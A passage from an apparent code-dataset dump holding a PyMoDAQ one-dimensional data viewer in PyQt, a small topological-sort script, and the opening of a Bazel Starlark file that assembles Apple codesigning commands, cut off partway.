self.roi_manager.new_ROI_signal.connect(self.add_lineout)\n self.roi_manager.remove_ROI_signal.connect(self.remove_ROI)\n # self.roi_manager.ROI_changed_finished.connect(self.update_lineouts)\n\n self.setupUI()\n\n self.wait_time = 3000\n self.measurement_module = None\n\n self.math_module = Viewer1D_math()\n\n if DAQ_Measurement is None: # pragma: no cover\n self.ui.do_measurements_pb.setVisible(False)\n\n self._labels = []\n self.plot_channels = None\n self.plot_colors = utils.plot_colors\n self.color_list = ROIManager.color_list\n self.lo_items = OrderedDict([])\n self.lo_data = OrderedDict([])\n self.ROI_bounds = []\n\n self._x_axis = None\n\n self.datas = [] # datas on each channel. list of 1D arrays\n self.data_to_export = None\n self.measurement_dict = OrderedDict(x_axis=None, datas=[], ROI_bounds=[], operations=[], channels=[])\n # OrderedDict to be send to the daq_measurement module\n self.measure_data_dict = OrderedDict()\n # dictionnary with data to be put in the table on the form: key=\"Meas.{}:\".format(ind)\n # and value is the result of a given lineout or measurement\n\n def setupUI(self):\n\n self.ui = QObject()\n\n self.parent.setLayout(QtWidgets.QVBoxLayout())\n splitter_hor = QtWidgets.QSplitter(Qt.Horizontal)\n\n # self.ui.statusbar = QtWidgets.QStatusBar()\n # self.ui.statusbar.setMaximumHeight(15)\n\n self.parent.layout().addWidget(splitter_hor)\n #self.parent.layout().addWidget(self.ui.statusbar)\n\n\n splitter_ver = QtWidgets.QSplitter(Qt.Vertical)\n splitter_hor.addWidget(splitter_ver)\n splitter_hor.addWidget(self.roi_manager.roiwidget)\n self.roi_manager.roiwidget.hide()\n\n\n self.ui.button_widget = QtWidgets.QToolBar()\n\n\n splitter_ver.addWidget(self.ui.button_widget)\n\n self.ui.Graph_Lineouts = pg.PlotWidget()\n\n widg = QtWidgets.QWidget()\n self.viewer = Viewer1DBasic(widg)\n splitter_ver.addWidget(widg)\n splitter_ver.addWidget(self.ui.Graph_Lineouts)\n self.ui.Graph1D = self.viewer # for backcompatibility\n self.roi_manager.viewer_widget = self.viewer.plotwidget\n\n self.setup_buttons(self.ui.button_widget)\n self.setup_zoom()\n\n self.legend = None\n self.axis_settings = dict(orientation='bottom', label='x axis', units='pxls')\n\n self.ui.xaxis_item = self.viewer.plotwidget.plotItem.getAxis('bottom')\n self.ui.Graph_Lineouts.hide()\n\n self.ui.aspect_ratio_pb.clicked.connect(self.lock_aspect_ratio)\n\n # #crosshair\n self.ui.crosshair = Crosshair(self.viewer.plotwidget.plotItem, orientation='vertical')\n self.ui.crosshair.crosshair_dragged.connect(self.update_crosshair_data)\n self.ui.crosshair_pb.clicked.connect(self.crosshairClicked)\n self.crosshairClicked()\n\n # self.ui.Measurement_widget=Dock(\"Measurement Module\", size=(300, 100), closable=True)\n # self.dockarea.addDock(self.ui.Measurement_widget)\n self.ui.Measurement_widget = QtWidgets.QWidget()\n self.ui.Measurement_widget.setVisible(False)\n\n # #Connecting buttons:\n self.ui.Do_math_pb.clicked.connect(self.do_math_fun)\n self.ui.do_measurements_pb.clicked.connect(self.open_measurement_module)\n self.ui.zoom_pb.clicked.connect(self.enable_zoom)\n self.ui.scatter.clicked.connect(self.do_scatter)\n self.ui.xyplot_action.triggered.connect(self.do_xy)\n\n def setup_buttons(self, button_widget):\n\n self.ui.zoom_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Zoom_to_Selection.png\")), 'Zoom Widget')\n self.ui.zoom_pb.setCheckable(True)\n button_widget.addAction(self.ui.zoom_pb)\n\n self.ui.Do_math_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Calculator.png\")), 'Do Math using ROI')\n self.ui.Do_math_pb.setCheckable(True)\n button_widget.addAction(self.ui.Do_math_pb)\n\n self.ui.do_measurements_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/MeasurementStudio_32.png\")),\n 'Do Advanced measurements (fits,...)')\n self.ui.do_measurements_pb.setCheckable(True)\n button_widget.addAction(self.ui.do_measurements_pb)\n\n self.ui.crosshair_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/reset.png\")),\n 'Show data cursor')\n self.ui.crosshair_pb.setCheckable(True)\n button_widget.addAction(self.ui.crosshair_pb)\n\n self.ui.aspect_ratio_pb = QAction(QIcon(QPixmap(\":/icons/Icon_Library/zoomReset.png\")),\n 'Fix the aspect ratio')\n self.ui.aspect_ratio_pb.setCheckable(True)\n button_widget.addAction(self.ui.aspect_ratio_pb)\n\n self.ui.scatter = QAction(QIcon(QPixmap(\":/icons/Icon_Library/Marker.png\")),\n 'Switch between line or scatter plots')\n self.ui.scatter.setCheckable(True)\n button_widget.addAction(self.ui.scatter)\n\n self.ui.xyplot_action = QAction(QIcon(QPixmap(\":/icons/Icon_Library/2d.png\")),\n 'Switch between normal or XY representation (valid for 2 channels)')\n self.ui.xyplot_action.setCheckable(True)\n button_widget.addAction(self.ui.xyplot_action)\n self.ui.xyplot_action.setVisible(False)\n\n self.ui.x_label = QAction('x:')\n button_widget.addAction(self.ui.x_label)\n\n self.ui.y_label = QAction('y:')\n button_widget.addAction(self.ui.y_label)\n\n\n def setup_zoom(self):\n # create and set the zoom widget\n # self.ui.zoom_widget=Dock(\"1DViewer zoom\", size=(300, 100), closable=True)\n self.ui.zoom_widget = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n self.ui.Graph_zoom = pg.PlotWidget()\n layout.addWidget(self.ui.Graph_zoom)\n self.ui.zoom_widget.setLayout(layout)\n\n self.ui.zoom_region = pg.LinearRegionItem()\n self.ui.zoom_region.setZValue(-10)\n self.ui.zoom_region.setBrush('r')\n self.ui.zoom_region.setOpacity(0.2)\n self.ui.Graph_zoom.addItem(self.ui.zoom_region)\n self.zoom_plot = []\n # self.dockarea.addDock(self.ui.zoom_widget)\n self.ui.zoom_widget.setVisible(False)\n\n def do_scatter(self):\n self.update_graph1D(self.datas)\n\n def do_xy(self):\n if self.ui.xyplot_action.isChecked():\n axis = self.viewer.plotwidget.plotItem.getAxis('bottom')\n axis.setLabel(text=self.labels[0], units='')\n axis = self.viewer.plotwidget.plotItem.getAxis('left')\n axis.setLabel(text=self.labels[1], units='')\n self.legend.setVisible(False)\n else:\n self.set_axis_label(dict(orientation='bottom', label=self.axis_settings['label'],\n units=self.axis_settings['units']))\n axis = self.viewer.plotwidget.plotItem.getAxis('left')\n axis.setLabel(text='', units='')\n self.legend.setVisible(True)\n self.update_graph1D(self.datas)\n\n def update_lineouts(self):\n try:\n operations = []\n channels = []\n for ind, key in enumerate(self.roi_manager.ROIs):\n operations.append(self.roi_manager.settings.child('ROIs', key, 'math_function').value())\n channels.append(\n self.roi_manager.settings.child('ROIs', key,\n 'use_channel').opts['limits'].index(\n self.roi_manager.settings.child('ROIs',\n key, 'use_channel').value()))\n self.lo_items[key].setPen(self.roi_manager.settings.child('ROIs', key,\n 'Color').value())\n\n self.measurement_dict['datas'] = self.datas\n self.measurement_dict['ROI_bounds'] = [self.roi_manager.ROIs[item].getRegion() for item in\n self.roi_manager.ROIs]\n self.measurement_dict['channels'] = channels\n self.measurement_dict['operations'] = operations\n\n data_lo = self.math_module.update_math(self.measurement_dict)\n self.show_math(data_lo)\n except Exception as e:\n pass\n\n @pyqtSlot(str)\n def remove_ROI(self, roi_name):\n\n item = self.lo_items.pop(roi_name)\n self.ui.Graph_Lineouts.plotItem.removeItem(item)\n self.measure_data_dict.pop(\"Lineout_{:s}:\".format(roi_name))\n self.update_lineouts()\n\n @pyqtSlot(int, str)\n def add_lineout(self, index, roi_type=''):\n try:\n item = self.roi_manager.ROIs['ROI_{:02d}'.format(index)]\n item_param = self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(index))\n item_param.child(('use_channel')).setOpts(limits=self.labels)\n if len(self.labels) == 0: # pragma: no cover\n lab = ''\n else:\n lab = self.labels[0]\n item_param.child(('use_channel')).setValue(lab)\n item.sigRegionChanged.connect(self.update_lineouts)\n item.sigRegionChangeFinished.connect(self.ROI_changed_finished.emit)\n for child in putils.iter_children_params(item_param, childlist=[]):\n if child.type() != 'group':\n child.sigValueChanged.connect(self.update_lineouts)\n\n item_lo = self.ui.Graph_Lineouts.plot()\n item_lo.setPen(item_param.child(('Color')).value())\n self.lo_items['ROI_{:02d}'.format(index)] = item_lo\n self.lo_data = OrderedDict([])\n for k in self.lo_items:\n self.lo_data[k] = np.zeros((1,))\n self.update_lineouts()\n except Exception as e:\n logger.exception(str(e))\n\n def clear_lo(self):\n self.lo_data = [[] for ind in range(len(self.lo_data))]\n self.update_lineouts()\n\n def crosshairClicked(self):\n if self.ui.crosshair_pb.isChecked():\n self.ui.crosshair.setVisible(True)\n self.ui.x_label.setVisible(True)\n self.ui.y_label.setVisible(True)\n range = self.viewer.plotwidget.plotItem.vb.viewRange()\n self.ui.crosshair.set_crosshair_position(xpos=np.mean(np.array(range[0])))\n else:\n self.ui.crosshair.setVisible(False)\n self.ui.x_label.setVisible(False)\n self.ui.y_label.setVisible(False)\n\n def do_math_fun(self):\n try:\n if self.ui.Do_math_pb.isChecked():\n self.roi_manager.roiwidget.show()\n self.ui.Graph_Lineouts.show()\n\n else:\n self.ui.Graph_Lineouts.hide()\n self.roi_manager.roiwidget.hide()\n\n except Exception as e:\n logger.exception(str(e))\n\n def do_zoom(self):\n bounds = self.ui.zoom_region.getRegion()\n self.viewer.plotwidget.setXRange(bounds[0], bounds[1])\n\n def enable_zoom(self):\n try:\n if not (self.ui.zoom_pb.isChecked()):\n if self.zoom_plot != []:\n for plot in self.zoom_plot:\n self.ui.Graph_zoom.removeItem(plot)\n self.ui.zoom_widget.hide()\n self.ui.zoom_region.sigRegionChanged.disconnect(self.do_zoom)\n\n else:\n self.zoom_plot = []\n for ind, data in enumerate(self.datas):\n channel = self.ui.Graph_zoom.plot()\n channel.setPen(self.plot_colors[ind])\n self.zoom_plot.append(channel)\n self.update_graph1D(self.datas)\n self.ui.zoom_region.setRegion([np.min(self._x_axis), np.max(self._x_axis)])\n\n self.ui.zoom_widget.show()\n self.ui.zoom_region.sigRegionChanged.connect(self.do_zoom)\n except Exception as e:\n logger.exception(str(e))\n\n def ini_data_plots(self, Nplots):\n try:\n self.plot_channels = []\n # if self.legend is not None:\n # self.viewer.plotwidget.plotItem.removeItem(self.legend)\n self.legend = self.viewer.plotwidget.plotItem.legend\n flag = True\n while flag:\n items = [item[1].text for item in self.legend.items]\n if len(items) == 0:\n flag = False\n else:\n self.legend.removeItem(items[0])\n channels = []\n for ind in range(Nplots):\n channel = self.viewer.plotwidget.plot()\n channel.setPen(self.plot_colors[ind])\n self.legend.addItem(channel, self._labels[ind])\n channels.append(ind)\n self.plot_channels.append(channel)\n except Exception as e:\n logger.exception(str(e))\n\n def update_labels(self, labels=[]):\n try:\n labels_tmp = labels[:]\n if self.labels == labels:\n if self.labels == [] or len(self.labels) < len(self.datas):\n self._labels = [\"CH{}\".format(ind) for ind in range(len(self.datas))]\n else:\n if self.legend is not None:\n flag = True\n while flag:\n items = [item[1].text for item in self.legend.items]\n if len(items) == 0:\n flag = False\n else:\n self.legend.removeItem(items[0])\n\n if len(labels) < len(self.plot_channels):\n for ind in range(len(labels), len(self.plot_channels)):\n labels_tmp.append('CH{:02d}'.format(ind))\n\n if len(labels_tmp) == len(self.plot_channels):\n for ind, channel in enumerate(self.plot_channels):\n self.legend.addItem(channel, labels_tmp[ind])\n\n self._labels = labels_tmp\n\n if self.labels != labels:\n for ind in range(len(self.roi_manager.ROIs)):\n val = self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').value()\n self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').setOpts(\n limits=self.labels)\n if val not in self.labels:\n self.roi_manager.settings.child('ROIs', 'ROI_{:02d}'.format(ind), 'use_channel').setValue(\n self.labels[0])\n\n self.ui.xyplot_action.setVisible(len(self.labels) == 2)\n\n\n except Exception as e:\n logger.exception(str(e))\n\n @property\n def labels(self):\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n self.update_labels(labels)\n self._labels = labels\n\n def lock_aspect_ratio(self):\n if self.ui.aspect_ratio_pb.isChecked():\n self.viewer.plotwidget.plotItem.vb.setAspectLocked(lock=True, ratio=1)\n else:\n self.viewer.plotwidget.plotItem.vb.setAspectLocked(lock=False)\n\n def open_measurement_module(self):\n if not (self.ui.Do_math_pb.isChecked()):\n self.ui.Do_math_pb.setChecked(True)\n QtWidgets.QApplication.processEvents()\n self.ui.Do_math_pb.clicked.emit()\n QtWidgets.QApplication.processEvents()\n\n self.ui.Measurement_widget.setVisible(True)\n if self.ui.do_measurements_pb.isChecked():\n Form = self.ui.Measurement_widget\n self.measurement_module = DAQ_Measurement(Form)\n # self.ui.Measurement_widget.addWidget(Form)\n self.measurement_module.measurement_signal[list].connect(self.show_measurement)\n self.update_measurement_module()\n\n elif self.measurement_module is not None:\n self.measurement_module.Quit_fun()\n\n def remove_plots(self):\n if self.plot_channels is not None:\n for channel in self.plot_channels:\n self.viewer.plotwidget.removeItem(channel)\n self.plot_channels = None\n if self.legend is not None:\n self.viewer.plotwidget.removeItem(self.legend)\n\n def set_axis_label(self, axis_settings=dict(orientation='bottom', label='x axis', units='pxls')):\n axis = self.viewer.plotwidget.plotItem.getAxis(axis_settings['orientation'])\n axis.setLabel(text=axis_settings['label'], units=axis_settings['units'])\n self.axis_settings = axis_settings\n\n @pyqtSlot(list)\n def show_data(self, datas, labels=None, x_axis=None):\n try:\n self.datas = datas\n self.update_labels(self.labels)\n\n self.data_to_export = OrderedDict(name=self.title, data0D=OrderedDict(), data1D=OrderedDict(), data2D=None)\n for ind, data in enumerate(datas):\n self.data_to_export['data1D']['CH{:03d}'.format(ind)] = utils.DataToExport()\n\n if self.plot_channels == [] or self.plot_channels is None: # initialize data and plots\n self.ini_data_plots(len(datas))\n\n elif len(self.plot_channels) != len(datas):\n self.remove_plots()\n self.ini_data_plots(len(datas))\n\n self.update_graph1D(datas)\n\n if x_axis is not None:\n self.x_axis = x_axis\n\n if labels is not None:\n self.update_labels(labels)\n\n if self.ui.do_measurements_pb.isChecked():\n self.update_measurement_module()\n\n except Exception as e:\n logger.exception(str(e))\n\n @pyqtSlot(list)\n def show_data_temp(self, datas):\n \"\"\"f\n to plot temporary data, for instance when all pixels are not yet populated...\n \"\"\"\n try:\n self.update_labels(self.labels)\n self.datas = datas\n\n if self.plot_channels is None: # initialize data and plots\n self.ini_data_plots(len(datas))\n elif len(self.plot_channels) != len(datas):\n self.remove_plots()\n self.ini_data_plots(len(datas))\n\n for ind_plot, data in enumerate(datas):\n if self.x_axis is None:\n self.x_axis = np.linspace(0, len(data), len(data), endpoint=False)\n x_axis = self.x_axis\n elif len(self.x_axis) != len(data):\n x_axis = np.linspace(0, len(data), len(data), endpoint=False)\n else:\n x_axis = self.x_axis\n\n self.plot_channels[ind_plot].setData(x=x_axis, y=data)\n except Exception as e:\n logger.exception(str(e))\n\n @pyqtSlot(list)\n def show_math(self, data_lo):\n # self.data_to_export=OrderedDict(x_axis=None,y_axis=None,z_axis=None,data0D=None,data1D=None,data2D=None)\n if len(data_lo) != 0:\n for ind, key in enumerate(self.lo_items):\n self.measure_data_dict[\"Lineout_{:s}:\".format(key)] = data_lo[ind]\n self.data_to_export['data0D']['Measure_{:03d}'.format(ind)] = utils.DataToExport(name=self.title,\n data=data_lo[ind],\n source='roi')\n self.roi_manager.settings.child(('measurements')).setValue(self.measure_data_dict)\n\n for ind, key in enumerate(self.lo_items):\n self.lo_data[key] = np.append(self.lo_data[key], data_lo[ind])\n self.lo_items[key].setData(y=self.lo_data[key])\n\n if not (self.ui.do_measurements_pb.isChecked()): # otherwise you export data from measurement\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n\n @pyqtSlot(list)\n def show_measurement(self, data_meas):\n ind_offset = len(self.data_to_export['data0D'])\n for ind, res in enumerate(data_meas):\n self.measure_data_dict[\"Meas.{}:\".format(ind)] = res\n self.data_to_export['data0D']['Measure_{:03d}'.format(ind + ind_offset)] = \\\n utils.DataToExport(name=self.title, data=res, source='roi')\n self.roi_manager.settings.child('measurements').setValue(self.measure_data_dict)\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n\n def update_crosshair_data(self, posx, posy, name=\"\"):\n try:\n indx = utils.find_index(self._x_axis, posx)[0][0]\n\n string = \"y=\"\n for data in self.datas:\n string += \"{:.6e} / \".format(data[indx])\n self.ui.y_label.setText(string)\n self.ui.x_label.setText(\"x={:.6e} \".format(posx))\n\n except Exception as e:\n pass\n\n def update_graph1D(self, datas):\n # self.data_to_export=OrderedDict(data0D=OrderedDict(),data1D=OrderedDict(),data2D=None)\n try:\n\n pens = []\n symbolBrushs = []\n symbolSize = 5\n for ind, ch in enumerate(self.plot_channels):\n if self.ui.scatter.isChecked():\n pens.append(None)\n symbol = 'o'\n symbolBrushs.append(self.plot_colors[ind])\n else:\n pens.append(self.plot_colors[ind])\n symbol = None\n\n symbolBrushs.append(None)\n\n if self.x_axis is None:\n self._x_axis = np.linspace(0, len(datas[0]), len(datas[0]), endpoint=False)\n elif len(self.x_axis) != len(datas[0]):\n self._x_axis = np.linspace(0, len(datas[0]), len(datas[0]), endpoint=False)\n\n for ind_plot, data in enumerate(datas):\n if not self.ui.xyplot_action.isChecked() or len(datas) == 0:\n self.plot_channels[ind_plot].setData(x=self.x_axis, y=data, pen=pens[ind_plot], symbol=symbol,\n symbolBrush=symbolBrushs[ind_plot], symbolSize=symbolSize,\n pxMode=True)\n else:\n self.plot_channels[ind_plot].setData(x=np.array([]), y=np.array([]), pen=pens[ind_plot], symbol=symbol,\n symbolBrush=symbolBrushs[ind_plot], symbolSize=symbolSize,\n pxMode=True)\n if self.ui.zoom_pb.isChecked():\n self.zoom_plot[ind_plot].setData(x=self.x_axis, y=data)\n x_axis = utils.Axis(data=self.x_axis, units=self.axis_settings['units'],\n label=self.axis_settings['label'])\n self.data_to_export['data1D']['CH{:03d}'.format(ind_plot)].update(\n OrderedDict(name=self.title, data=data, x_axis=x_axis, source='raw')) # to be saved or exported\n\n if self.ui.xyplot_action.isChecked() and len(datas) > 1:\n self.plot_channels[0].setData(x=datas[0], y=datas[1], pen=pens[0], symbol=symbol,\n symbolBrush=symbolBrushs[0], symbolSize=symbolSize,\n pxMode=True)\n\n if not self.ui.Do_math_pb.isChecked(): # otherwise math is done and then data is exported\n self.data_to_export['acq_time_s'] = datetime.datetime.now().timestamp()\n self.data_to_export_signal.emit(self.data_to_export)\n else:\n self.measurement_dict['datas'] = datas\n if self.measurement_dict['x_axis'] is None:\n self.measurement_dict['x_axis'] = self._x_axis\n data_lo = self.math_module.update_math(self.measurement_dict)\n self.show_math(data_lo)\n\n except Exception as e:\n logger.exception(str(e))\n\n def update_measurement_module(self):\n xdata = self.measurement_dict['x_axis']\n ydata = self.measurement_dict['datas'][0]\n if xdata is None:\n self.measurement_module.update_data(ydata=ydata)\n else:\n self.measurement_module.update_data(xdata=xdata, ydata=ydata)\n\n def update_status(self, txt):\n logger.info(txt)\n\n @property\n def x_axis(self):\n return self._x_axis\n\n @x_axis.setter\n def x_axis(self, x_axis):\n label = 'Pxls'\n units = ''\n if isinstance(x_axis, dict):\n if 'data' in x_axis:\n xdata = x_axis['data']\n if 'label' in x_axis:\n label = x_axis['label']\n if 'units' in x_axis:\n units = x_axis['units']\n else:\n xdata = x_axis\n self._x_axis = xdata\n self.measurement_dict['x_axis'] = self._x_axis\n if self.datas != []:\n self.show_data_temp(self.datas)\n self.set_axis_label(dict(orientation='bottom', label=label, units=units))\n\n\nclass Viewer1D_math(QObject):\n status_sig = pyqtSignal(list)\n\n def __init__(self):\n super(QObject, self).__init__()\n self.datas = []\n self.ROI_bounds = []\n self.x_axis = None\n self.operations = []\n self.channels = []\n\n def update_math(self, measurement_dict):\n try:\n if 'datas' in measurement_dict:\n self.datas = measurement_dict['datas']\n if 'ROI_bounds' in measurement_dict:\n self.ROI_bounds = measurement_dict['ROI_bounds']\n if 'x_axis' in measurement_dict:\n self.x_axis = measurement_dict['x_axis']\n if 'operations' in measurement_dict:\n self.operations = measurement_dict['operations']\n if 'channels' in measurement_dict:\n self.channels = measurement_dict['channels']\n\n # self.status_sig.emit([\"Update_Status\",\"doing math\"])\n data_lo = []\n for ind_meas in range(len(self.operations)):\n indexes = utils.find_index(self.x_axis, self.ROI_bounds[ind_meas])\n ind1 = indexes[0][0]\n ind2 = indexes[1][0]\n sub_data = self.datas[self.channels[ind_meas]][ind1:ind2]\n sub_xaxis = self.x_axis[ind1:ind2]\n\n if self.operations[ind_meas] == \"Mean\":\n data_lo.append(float(np.mean(sub_data)))\n elif self.operations[ind_meas] == \"Sum\":\n data_lo.append(float(np.sum(sub_data)))\n elif self.operations[ind_meas] == 'half-life' or self.operations[ind_meas] == 'expotime':\n ind_x0 = utils.find_index(sub_data, np.max(sub_data))[0][0]\n x0 = sub_xaxis[ind_x0]\n sub_xaxis = sub_xaxis[ind_x0:]\n sub_data = sub_data[ind_x0:]\n offset = sub_data[-1]\n N0 = np.max(sub_data) - offset\n if self.operations[ind_meas] == 'half-life':\n time = sub_xaxis[utils.find_index(sub_data - offset, 0.5 * N0)[0][0]] - x0\n elif self.operations[ind_meas] == 'expotime':\n time = sub_xaxis[utils.find_index(sub_data - offset, 0.37 * N0)[0][0]] - x0\n data_lo.append(time)\n\n return data_lo\n except Exception as e:\n logger.exception(str(e))\n return []\n\n\nif __name__ == '__main__': # pragma: no cover\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n prog = Viewer1D(Form)\n\n from pymodaq.daq_utils.daq_utils import gauss1D\n\n x = np.linspace(0, 200, 201)\n y1 = gauss1D(x, 75, 25)\n y2 = gauss1D(x, 120, 50, 2)\n tau_half = 27\n tau2 = 100\n x0 = 50\n dx = 20\n ydata_expodec = np.zeros((len(x)))\n ydata_expodec[:50] = 1 * gauss1D(x[:50], x0, dx, 2)\n ydata_expodec[50:] = 1 * np.exp(-(x[50:] - x0) / (tau_half / np.log(2))) # +1*np.exp(-(x[50:]-x0)/tau2)\n ydata_expodec += 0.1 * np.random.rand(len(x))\n\n # x = np.sin(np.linspace(0,6*np.pi,201))\n # y = np.sin(np.linspace(0, 6*np.pi, 201)+np.pi/2)\n\n Form.show()\n prog.ui.Do_math_pb.click()\n QtWidgets.QApplication.processEvents()\n prog.x_axis = x\n # prog.show_data([y, y+2])\n prog.show_data([y1, y2, ydata_expodec])\n QtWidgets.QApplication.processEvents()\n prog.update_labels(['coucou', 'label2'])\n sys.exit(app.exec_())\n"} {"ext": "py", "sha": "1a2f4fa11d88a0f3f192fd7453d835cbb54f7831", "content": "# Author: Phyllipe Bezerra (https://github.com/pmba)\n\nclothes = {\n 0: \"underwear\",\n 1: \"pants\",\n 2: \"belt\",\n 3: \"suit\",\n 4: \"shoe\",\n 5: \"socks\",\n 6: \"shirt\",\n 7: \"tie\",\n 8: \"clock\",\n}\n\ngraph = [[1, 4], [2, 4], [3], [], [], [4], [2, 7], [3], []]\n\nvisited = [0 for x in range(len(graph))]\nstack = []\n\n\ndef print_stack(stack, clothes):\n order = 1\n while stack:\n cur_clothe = stack.pop()\n print(order, clothes[cur_clothe])\n order += 1\n\n\ndef dfs(u, visited, graph):\n visited[u] = 1\n for v in graph[u]:\n if not visited[v]:\n dfs(v, visited, graph)\n\n stack.append(u)\n\n\ndef top_sort(graph, visited):\n for v in range(len(graph)):\n if not visited[v]:\n dfs(v, visited, graph)\n\n\nif __name__ == \"__main__\":\n top_sort(graph, visited)\n print(stack)\n print_stack(stack, clothes)\n"} {"ext": "bzl", "sha": "1a2f4fd9aca8b324e74562a7cd5cb686149c0cd9", "content": "# Copyright 2018 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Actions related to codesigning.\"\"\"\n\nload(\n \"@build_bazel_rules_apple//apple/internal/utils:defines.bzl\",\n \"defines\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal/utils:legacy_actions.bzl\",\n \"legacy_actions\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:intermediates.bzl\",\n \"intermediates\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:platform_support.bzl\",\n \"platform_support\",\n)\nload(\n \"@build_bazel_rules_apple//apple/internal:rule_support.bzl\",\n \"rule_support\",\n)\nload(\n \"@bazel_skylib//lib:paths.bzl\",\n \"paths\",\n)\nload(\n \"@bazel_skylib//lib:shell.bzl\",\n \"shell\",\n)\n\ndef _double_quote(raw_string):\n \"\"\"Add double quotes around the string and preserve existing quote characters.\n\n Args:\n raw_string: A string that might have shell-syntaxed environment variables.\n\n Returns:\n The string with double quotes.\n \"\"\"\n return \"\\\"\" + raw_string.replace(\"\\\"\", \"\\\\\\\"\") + \"\\\"\"\n\ndef _no_op(x):\n \"\"\"Helper that does not nothing be return the result.\"\"\"\n return x\n\ndef _codesign_args_for_path(\n ctx,\n path_to_sign,\n provisioning_profile,\n entitlements_file,\n shell_quote = True):\n \"\"\"Returns a command line for the codesigning tool wrapper script.\n\n Args:\n ctx: The Starlark context.\n path_to_sign: A struct indicating the path that should be signed and its\n optionality (see `_path_to_sign`).\n provisioning_profile: The provisioning profile file. May be `None`.\n entitlements_file: The entitlements file to pass to codesign. May be `None`\n for non-app binaries (e.g. test bundles).\n shell_quote: Sanitizes the arguments to be evaluated in a shell.\n\n Returns:\n The codesign command invocation for the given directory as a list.\n \"\"\"\n if not path_to_sign.is_directory and path_to_sign.signed_frameworks:\n fail(\"Internal Error: Received a list of signed frameworks as exceptions \" +\n \"for code signing, but path to sign is not a directory.\")\n\n for x in path_to_sign.signed_frameworks:\n if not x.startswith(path_to_sign.path):\n fail(\"Internal Error: Signed framework does not have the current path \" +\n \"to sign (%s) as its prefix (%s).\" % (path_to_sign.path, x))\n\n cmd_codesigning = [\n \"--codesign\",\n \"/usr/bin/codesign\",\n ]\n\n is_device = platform_support.is_device_build(ctx)\n\n # Add quotes for sanitizing inputs when they're invoked directly from a shell script, for\n # instance when using this string to assemble the output of codesigning_command.\n maybe_quote = shell.quote if shell_quote else _no_op\n maybe_double_quote = _double_quote if shell_quote else _no_op\n\n # First, try to use the identity passed on the command line, if any. If it's a simulator build,\n # use an ad hoc identity.\n identity = ctx.fragments.objc.signing_certificate_name if is_device else \"-\"\n if not identity:\n if provisioning_profile:\n cmd_codesigning.extend([\n \"--mobileprovision\",\n maybe_quote(provisioning_profile.path),\n ])\n\n else:\n identity = \"-\"\n\n if identity:\n cmd_codesigning.extend([\n \"--identity\",\n maybe_quote(identity),\n ])\n\n # The entitlements rule ensures that entitlements_file is None or a file\n # containing only \"com.apple.security.get-task-allow\" when building for the\n # simulator.\n if path_to_sign.use_entitlements and entitlements_file:\n cmd_codesigning.extend([\n \"--entitlements\",\n maybe_quote(entitlements_file.path),\n ])\n\n if is_device:\n cmd_codesigning.append(\"--force\")\n else:\n cmd_codesigning.extend([\n \"--force\",\n \"--disable_timestamp\",\n ])\n\n if path_to_sign.is_directory:\n cmd_codesigning.append(\"--directory_to_sign\")\n else:\n cmd_codesigning.append(\"--target_to_sign\")\n\n # Because the path does include environment variables which need to be expanded, path has to be\n # quoted using double quotes, this means that path can't be quoted using shell.quote.\n cmd_codesigning.append(maybe_double_quote(path_to_sign.path))\n\n if path_to_sign.signed_frameworks:\n for signed_framework in path_to_sign.signed_frameworks:\n # Signed frameworks must also be double quoted, as they too have an environment\n # variable to be expanded.\n cmd_codesigning.extend([\n \"--signed_path\",\n maybe_double_quote(signed_framework),\n ])\n\n return cmd_codesigning\n\ndef _path_to_sign(path, is_directory = False, signed_frameworks = [], use_entitlements = True):\n \"\"\"Returns a \"path to sign\" value to be passed to `_signing_command_lines`.\n\n Args:\n path: The path to sign, relative to wherever the code signing command lines\n are being executed.\n is_directory: If `True`, the path is a directory and not a bundle, indicating\n that the contents of each item in the directory should be code signed\n except for the invisible files prefixed with a period.\n signed_frameworks: If provided, a list of frameworks that have already been signed.\n use_entitlements: If provided, indicates if the entitlements on the bundling\n target should be used for signing this path (useful to disabled the use\n when signing frameworks within an iOS app).\n\n Returns:\n A `struct` that can be passed to `_signing_command_lines`.\n \"\"\"\n return struct(\n path = path,\n is_directory = is_directory,\n signed_frameworks = signed_frameworks,\n use_entitlements = use_entitlements,\n )\n\ndef _provisioning_profile(ctx):\n # Verify that a provisioning profile was provided for device builds on\n # platforms that require it.\n is_device = platform_support.is_device_build(ctx)\n provisioning_profile = getattr(ctx.file, \"provisioning_profile\", None)\n rule_descriptor = rule_support.rule_descriptor(ctx)\n if (is_device and\n rule_descriptor.requires_signing_for_device and\n not provisioning_profile):\n fail(\"The provisioning_profile attribute must be set for device \" +\n \"builds on this platform (%s).\" %\n platform_support.platform_type(ctx))\n return provisioning_profile\n\ndef _signing_command_lines(\n ctx,\n paths_to_sign,\n entitlements_file):\n \"\"\"Returns a multi-line string with codesign invocations for the bundle.\n\n For any signing identity other than ad hoc, the identity is verified as being\n valid in the keychain and an error will be emitted if the identity cannot be\n used for signing for any reason.\n\n Args:\n ctx: The Starlark context.\n paths_to_sign: A list of values returned from `path_to_sign` that indicate\n paths that should be code-signed.\n entitlements_file: The entitlements file to pass to codesign.\n\n Returns:\n A multi-line string with codesign 